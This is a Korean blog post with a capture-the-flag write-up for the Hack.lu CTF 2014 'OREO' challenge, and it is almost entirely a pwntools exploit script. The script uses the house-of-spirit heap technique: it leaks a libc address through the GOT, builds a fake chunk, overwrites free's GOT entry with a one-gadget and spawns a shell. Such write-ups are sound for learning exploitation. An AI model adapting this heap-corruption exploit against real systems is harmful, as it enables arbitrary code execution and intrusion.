cdor1's lab
Hack.lu CTF 2014 OREO 본문
후기 : house of spirit라는 취약점을 이용해서 할당이 내가 만들어준 fake chunk에 되도록 만들어 익스플로잇했다.
from pwn import *
s = process('./oreo')
elf = ELF('/home/cdor1/pwnable/oreo')
def add(name, des):
s.sendline('1')
#print s.recvuntil('Rifle name: ')
s.sendline(name)
#print s.recvuntil('Rifle description: ')
s.sendline(des)
print s.recvuntil('6. Exit!')
add('AAAA','AAAA')
add('BBBB','BBBB')
add('CCCC','CCCC')
pay1 = 'a'*27
pay1 += p32(elf.got['puts'])
add(pay1, 'CCCC')
s.sendline('2')
print s.recvuntil('Description: ')
print s.recvuntil('Description: ')
leak = u32(s.recv(4))
base = leak - 0x6FD60
oneshot = base + 0x46428
log.info('leak : ' + hex(leak))
log.info('base : ' + hex(base))
log.info('oneshot : ' + hex(oneshot))
pay2 = 'b'*27
pay2 += p32(0x0804A2A8)
add(pay2, 'DDDD')
pay3 = p32(0)*9
pay3 += p32(0x12c)
pay3 += 'AAAA'
pay3 += p32(0)*10
s.sendline('4')
s.sendline(pay3)
s.sendline('3')
add('EEEE', p32(elf.got['free']))
s.sendline('4')
s.sendline(p32(oneshot))
s.sendline('3')
s.interactive()
'Security > Pwnable' 카테고리의 다른 글
| HITCON 2014 stkof (0) | 2017.01.20 |
|---|---|
| TJCTF blag (0) | 2017.01.19 |
| 9447 CTF search engine (0) | 2017.01.18 |
| SECCON 2016 shopping (0) | 2017.01.17 |
| SECUINSIDE Quals 2016 noted (0) | 2017.01.17 |
Comments